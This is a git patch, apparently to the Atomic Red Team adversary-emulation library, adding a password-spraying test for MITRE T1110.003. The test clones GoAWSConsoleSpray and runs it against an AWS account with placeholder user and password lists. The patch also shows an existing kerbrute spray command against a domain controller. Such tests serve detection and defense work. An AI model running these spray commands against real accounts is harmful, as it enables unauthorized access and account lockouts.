From dfd1f668affa95656225afd9cc895a9872324c56 Mon Sep 17 00:00:00 2001
From: patel-bhavin <bhavin.j.patel91@gmail.com>
Date: Wed, 19 Oct 2022 16:16:08 -0700
Subject: [PATCH] adding atomic

---
 atomics/T1110.003/T1110.003.yaml        | 29 ++++++++++++++++++++++++-
 atomics/T1110.003/src/aws_passwords.txt |  2 ++
 atomics/T1110.003/src/aws_users.txt     |  2 ++
 3 files changed, 32 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1110.003/src/aws_passwords.txt
 create mode 100644 atomics/T1110.003/src/aws_users.txt

diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 1105ec2b..96571458 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -288,4 +288,31 @@ atomic_tests:
     command: |
       cd $env:temp
       .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132 
-      
+- name: AWS - Password Spray an AWS using GoAWSConsoleSpray
+  auto_generated_guid: 9c10d16b-20b1-403a-8e67-50ef7117ed4e
+  description: |
+    GoAWSConsoleSpray is a tool that can be used to spray AWS IAM Console Credentials in order to identify a valid login for a user account built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    aws_account_id:
+      description: ID of the AWS account
+      type: String
+      default: "XXXXXXXX"
+  dependencies:
+    - description: |
+        Check if go is installed
+      prereq_command: |
+        go version
+      get_prereq_command: |
+        echo Install GO
+  executor:
+    command: |
+       cd /tmp
+       git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
+       cd /tmp/GoAWSConsoleSpray
+       go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
+    cleanup_command: |
+       rm -rf /tmp/GoAWSConsoleSpray
+    name: sh
+    elevation_required: false
\ No newline at end of file
diff --git a/atomics/T1110.003/src/aws_passwords.txt b/atomics/T1110.003/src/aws_passwords.txt
new file mode 100644
index 00000000..3bab5cc5
--- /dev/null
+++ b/atomics/T1110.003/src/aws_passwords.txt
@@ -0,0 +1,2 @@
+password
+password2
\ No newline at end of file
diff --git a/atomics/T1110.003/src/aws_users.txt b/atomics/T1110.003/src/aws_users.txt
new file mode 100644
index 00000000..afa06df2
--- /dev/null
+++ b/atomics/T1110.003/src/aws_users.txt
@@ -0,0 +1,2 @@
+user1
+user2
\ No newline at end of file